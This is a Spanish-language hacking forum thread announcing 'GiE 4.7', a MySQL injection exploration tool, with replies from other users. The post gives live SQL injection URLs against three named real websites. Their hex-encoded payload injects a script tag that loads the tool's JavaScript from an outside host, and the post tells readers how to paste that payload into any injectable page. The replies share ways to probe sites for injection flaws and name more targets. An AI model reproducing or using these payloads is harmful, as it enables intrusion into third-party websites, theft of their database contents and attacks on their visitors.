GiE 4.7
No voy a escribir una descripción de que es la GiE, las nuevas características, etc, etc.
Simplemente voy a dejar el link de la
VERSION 3.0 (http://foro.elhacker.net/nivel_web/mysqli_general_inejction_explorer_by_ponymagic-t277754.0.html;msg1366415) para el que quiera saber "que es".
De esta nueva version solo voy a poner algunos screens, links con ejemplos, el código de fuente y el código para insertarlo en cualquier SQLi.
- Screens:
(http://r.i.elhacker.net/cache?url=http://img188.imageshack.us/img188/716/screen1mif.png)
explorador de bases de datos.
(http://r.i.elhacker.net/cache?url=http://img706.imageshack.us/img706/8052/screen2qt.png)
lector de archivos, con Bruteforce.
(http://r.i.elhacker.net/cache?url=http://img139.imageshack.us/img139/1423/screen5q.png)
consola de peticiones, en la imagen un ejemplo
de una query que busca mails en la base de datos.
(http://r.i.elhacker.net/cache?url=http://img41.imageshack.us/img41/5285/screen4mc.png)
variables del servidor
(http://r.i.elhacker.net/cache?url=http://img21.imageshack.us/img21/1570/screen3yu.png)
Historial de Inyecciones, para el que quiera
saber un poco mas sobre el funcionamiento de la GIE
- Ejemplos:
SQLi GIE [adegasgalegas.es] (http://www.adegasgalegas.es/en/html/comprar.php?id=-1%20union%20select%200,1,(0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--)
SQLi GIE [rubias19.com] (http://www.rubias19.com/elnoticiario/videos/index.php?id=4620%20and%200%20union%20select%201,%280x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e%29,3,4--)
SQLi GIE [comic-ar.com] (http://comic-ar.com/entrada.php?Id=86%20and%200%20union%20select%201,%280x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e%29,3,4,5,6,7,8,9,0,1,2,3--)
- Usarlo en cualqueir SQLi:
En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.
(0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)
Codigo de fuente (http://sindelen.cl/admin/uploads/images/GiE.js)
Codigo de fuente Paste2 Highlight (http://paste2.org/p/719084)
como ya dije en DDR cada dia te superas^^
(aqui no se pueden dar puntos que si no... xD )
jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo, ;-) probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ...
Saludos
Edito...
Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico
saludos ;D
Cita de: alexkof158 en 16 Marzo 2010, 23:48 PM... hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico
Estás en las iSQL sin saber como es la identificación de sitios vulnerables?
Cita de: alexkof158 en 16 Marzo 2010, 23:48 PM
jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo, ;-) probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ...
Saludos
Edito...
Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico
saludos ;D
http://www.rubias19.com/elnoticiario/videos/index.php?id='
POr cierto ponymagic qué sentido tiene difuminar en todas las fotos la parte de la URL si te dejas una sin difuminar? jajaja fail xD
Cita de: tragantras en 17 Marzo 2010, 00:16 AM
Cita de: alexkof158 en 16 Marzo 2010, 23:48 PM
jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo, ;-) probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ...
Saludos
Edito...
Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico
saludos ;D
http://www.rubias19.com/elnoticiario/videos/index.php?id='
POr cierto ponymagic qué sentido tiene difuminar en todas las fotos la parte de la URL si te dejas una sin difuminar? jajaja fail xD
aclare http://comic-ar.com/entrada.php?Id= (http://comic-ar.com/entrada.php?Id=)
saludos
Cita de: Alex@ShellRoot en 17 Marzo 2010, 00:04 AM
Cita de: alexkof158 en 16 Marzo 2010, 23:48 PM... hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico
Estás en las iSQL sin saber como es la identificación de sitios vulnerables?
joder, obviamente que si se 1 and 1=1-- or 1 and 1=0-- o comillas simples y que tire error sql o algo asi ... pero con comic.ar ninguna de estas funciona...ahora si entiendennn o me explico federicooo
1) Disfumine por si Murder se quejaba, asi solamente quitaba las SQLi. ( Murder: el admin de diosdelared )
2) http://comic-ar.com/entrada.php?Id=86'
3) Agradeceria que comenten algo sobre el post en vez de discutir como diferenciar un modulo vulnerable a SQLi.
hola, está super bueno, me gustó.
Buenisimo... Felicitaciones ;-) ;-) ;-) ;-)
exceleeente, muy buen programa, rapido, sencillo, bonito ;-) ;-)